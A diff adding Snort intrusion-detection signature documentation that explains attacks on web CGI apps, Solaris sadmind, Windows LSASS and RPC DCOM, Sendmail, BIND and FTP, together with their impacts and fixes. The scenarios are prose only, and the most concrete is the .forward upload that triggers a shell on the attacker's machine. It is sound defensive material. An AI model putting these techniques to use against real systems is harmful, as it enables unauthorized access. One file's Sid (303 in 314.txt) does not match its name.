+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1645.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1645
+
+--
+Summary:
+This event is generated when an attempt is made to access /testcgi on a 
+web server. This may indicate an attempt to exploit a cross-site 
+scripting vulnerability that affects Ceilidh.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a 
+cross-site scripting vulnerability in Ceilidh, web-based discussion 
+software released by Lilikoi Software, Inc. An attacker can craft a URL 
+that passes malicious code to testcgi.exe. If a legitimate user 
+activates the URL, malicious code may be executed on the client 
+computer.
+
+--
+Affected Systems:
+All web servers that Ceilidh 2.6 or 2.7 are vulnerable.
+All clients that access Ceilidh 2.6 or 2.7 are vulnerable.
+
+--
+Attack Scenarios:
+An attacker may craft a script that obtains the user's session cookie, 
+thereby allowing the attacker to pose as the user for the duration of 
+the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses testcgi.exe, this rule may generate
+an event. 
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7214
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11610
+
+--
--- /dev/null
+++ b/doc/signatures/1654.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1654
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1911.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1911
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access. This attack may permit execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite
+applications to perform remote distributed system administration tasks
+such as adding new users. A buffer overflow associated with the
+NETMGT_PROC_SERVICE request of sadmind exists because of improper bounds
+checking. This may permit execution of arbitrary commands with the
+privileges of root.
+
+--
+Affected Systems:
+	Sun Solaris 2.5, 2.5.1, 2.6, 7.0
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root
+access to the remote host.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2524.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2524
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/334.txt
@@ -0,0 +1,64 @@
+Rule:   
+
+--
+Sid: 334
+
+-- 
+Summary: 
+This event is generated when an attempt to copy a specific file to an FTP server is made.
+
+-- 
+
+Impact: 
+Serious. The attacker might gain the ability to execute commands remotely with the privileges of the affected user.
+
+--
+Detailed Information:
+This event is generated when an attempt to copy a ".forward" file to a victim host is made. A ".forward"file is used to configure email forwarding on UNIX systems. Usually it contains the email addresses where incoming email is forwarded. However, ".forward" file can also be used to forward email to programs (for example, "|IFS=' ' && exec /usr/bin/procmail -f- || exit 75 anton") and thus cause program execution triggered by arriving email messages. 
+
+This functionality can be used to activate a backdoor or start a daemon that listens for connections on a high port, launch a terminal session on the attacker's machine or initiate a reverse shell session. 
+
+This attack requires an established FTP session.
+
+--
+
+Attack Scenarios: 
+The attacker uploads a ".forward" file with commands to launch an "xterm" window on his machine into the user's home directory. Then he sends an email to the user whose ".forward" file was modified. That triggers the command in ".forward" and causes the xterm windows to be opened, providing shell access to a system with the privileges assigned to that user.
+
+-- 
+
+Ease of Attack: 
+The attack requires an access to a users home directory via FTP. This means that anonymous FTP access cannot be used for such an attack and a valid username and password is required. Additionally, the ability to upload files via FTP is required for a successful attack.
+
+-- 
+
+False Positives: 
+If the string ".forward"  is contained within the filename that is being uploaded to a server or within other FTP client responses, the rule will generate an event.
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Locate the uploaded ".forward" file and check it for signs of suspicious entries. 
+
+Check the server logs for other suspicious events that might have occurred within the same FTP session
+
+Disallow uploading of files via FTP and use Secure Shell (SSH) for transferring files by users.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS319
+
+--
--- /dev/null
+++ b/doc/signatures/100000367.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000367
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_board.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_board.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2761.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2761
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_priority_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3378.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3378
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/664.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+664
+
+--
+Summary:
+This event is generated when maliciously formatted "rcpt to" text is supplied to Sendmail.
+
+--
+Impact:
+Attempted administrator access.  A successful attack can allow remote execution of commands with root privleges.
+
+--
+Detailed Information:
+A vulnerability exists in older versions of Sendmail that incorrectly parses message headers.  This can allow a malicious user to execute arbitrary commands as root.
+
+--
+Affected Systems:
+Sendmail versions prior to 8.6.10 and any version based on 5.x.
+
+--
+Attack Scenarios:
+An attacker can craft a malicious mail header that executes a command.
+
+--
+Ease of Attack:
+Easy.  Use a maliciously formatted header.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to version 8.6.10 or higher of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2308
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+
+--
--- /dev/null
+++ b/doc/signatures/1769.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1769
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/314.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+303
+
+--
+Summary:
+This event is generated when a specific inverse query is performed against your DNS server as a precursor to a possible TSIG (transaction signature) buffer overflow attack. 
+
+--
+Impact:
+Intelligence gathering.  This event generates as a result of an inverse query of the DNS server in an attempt to gain access to information required for the TSIG exploit.  An attacker will usually attempt a buffer overflow exploit if there is a response to the inverse query.
+
+--
+Detailed Information:
+This is an attempt to perform a specific DNS inverse query against your DNS server.  While this specific action is not harmful itself, it signals a precusor to a possible buffer overflow attack for a TSIG vulernability.  The inverse query is performed as a reconnaissance for the TSIG attack. 
+
+--
+Affected Systems:
+BIND Versions 4 and Versions 8 through 8.2 are susceptible to the inverse query information leak.
+
+--
+Attack Scenarios:
+If a DNS server responds to the inverse query and leaks information required for the actual attack, the attacker exploitsthe TSIG buffer overflow vulnerability.  If this is successful, the attacker gains access to the DNS server at the privilege of the "named" daemon.
+
+--
+Ease of Attack:
+Easy. Code is available to exploit the vulnerability.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+An attacker could change the exploit code.  For instance, an attacker could change the DNS identification number in the code to be something other than 0xABCD and the rule would not fire.
+
+--
+Corrective Action:
+Update to BIND versions greater than 8.2 to prevent the information leak.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2302
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0010
+
+Arachnids:
+http://www.whitehats.com/info/IDS482
+
+
+--
--- /dev/null
+++ b/doc/signatures/3351.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3351
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1302.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1302
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1102.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1102
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2974.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2974
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2347.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2347
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+partner.php script which contains known vulnerabilities and
+is part of  the myPHPNuke web application running on a server.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the myPHPNuke web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to
+cross site scripting attacks.
+
+--
+Affected Systems:
+	myPHPNuke 1.8.8
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+Default_Theme parameter of the partner.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2231.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2231
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
--- /dev/null
+++ b/doc/signatures/2275.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2275
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to an
+SMTP server using brute force methods.
+
+--
+Impact:
+Attempted remote access.  
+This event may indicate that an attacker is attempting to guess username and password combinations.  
+Alternately, it may indicate that an authorized user has entered an
+incorrect username and password combination a number of times.
+
+--
+Detailed Information:
+An SMTP server will issue an error message after a failed login attempt.  
+This may be an indication of an attacker attempting brute force guessing 
+of username and password combinations.  It is also possible that an authorized 
+user has incorrectly entered a legitimate username and password combination.  
+
+This event will be generated after a number of failed attempts.
+
+--
+Affected Systems:
+SMTP servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed SMTP login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000114.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000114
+
+-- 
+Summary: 
+This event is generated when an attacker attempts to execute arbitrary commands 
+on a system running the HappyMall E-Commerce suite.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary commands of their choosing with the permissions of 
+the affected script.
+
+--
+Detailed Information:
+By specifying a value for the "file" parameter of the "normal_html.cgi" script 
+that is enclosed by any combination of pipe or semicolon characters, attackers 
+may execute arbitrary commands on the host system with the privileges of the 
+affected script.
+
+--
+Affected Systems:
+HappyCGI HappyMall 4.3
+HappyCGI HappyMall 4.4
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited using a web browser, or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser or publicly available exploits may be used.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unconfirmed patch is available at the URI listed in the Additional 
+References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://happymall.happycgi.com/forum/forum_detail.cgi?thread=353
+
+--
--- /dev/null
+++ b/doc/signatures/100000656.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000656
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "email" parameter in the "guestbook.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2453.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2453
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running is invited to participate in a Yahoo conference.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A Yahoo IM conference allows multiple users to participate in the exchange of text and voice messages, as well as share files and webcams.  It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1312.txt
